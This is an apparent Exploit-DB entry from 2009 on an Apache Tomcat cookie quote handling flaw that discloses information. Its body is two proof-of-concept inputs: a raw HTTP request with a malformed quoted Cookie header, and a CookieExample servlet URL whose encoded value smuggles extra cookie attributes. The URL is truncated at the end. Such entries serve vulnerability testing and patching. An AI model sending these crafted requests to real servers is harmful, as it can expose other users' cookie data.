Apache Tomcat Cookie Quote Handling Remote Information Disclosure Vulnerability

2009-11-09T00:00:00
ID EDB-ID:9994
Type exploitdb
Reporter John Kew
Modified 2009-11-09T00:00:00

Description

Apache Tomcat Cookie Quote Handling Remote Information Disclosure Vulnerability. Remote exploits for multiple platform

                                        
                                            The following examples are available:

+++
GET /myapp/MyCookies HTTP/1.1
Host: localhost
Cookie: name="val " ue"
Cookie: name1=moi
+++

http://www.example.com/examples/servlets/servlet/CookieExample?cookiename=test&cookievalue=test%5c%5c%22%3B+Expires%3DThu%2C+1+Jan+2009+00%3A00%3A01+UTC%
3B+Path%3D%2Fservlets-examples%2Fservlet+%3